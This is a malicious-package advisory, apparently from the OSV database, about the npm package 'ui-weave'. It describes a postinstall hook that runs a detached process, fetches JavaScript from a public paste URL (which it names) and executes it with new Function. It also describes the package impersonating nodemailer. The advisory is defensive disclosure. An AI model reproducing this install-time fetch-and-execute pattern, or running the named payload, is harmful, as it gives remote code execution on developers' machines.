OSV ID
MAL-2026-5406
Ecosystem
npm
Summary
package.json declares postinstall: node lib/utils/index.js , which spawns a detached child process running lib/utils/smtp-connection/index.js. That script fetches https://www.jsonkeeper.com/b/QHDXR and feeds the response's data.cookie field directly into new Function('require', data.cookie)(require) , executing whatever JavaScript is hosted at that URL on every machine that runs npm install ui-weave . jsonkeeper.com is a public, mutable, anonymous paste host — the author can change the served payload at any time without republishing the package. The detached/unref'd spawn is intended to outlive the install command. The package additionally impersonates nodemailer: it ships nodemailer's source under lib/nodemailer.js , claims author Andris Reinman (the real nodemailer maintainer), and copies an unrelated React Training copyright string as its description, while being published under the unrelated name ui-weave with homepage ui-weave.com . The impersonation provides a veneer of legitimacy for the install-time remote-code-execution payload.
Source: amazon-inspector (ee5b1184b3208f8eee80df74c37c809f93461564a9226e1f82e1d551770d799a)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.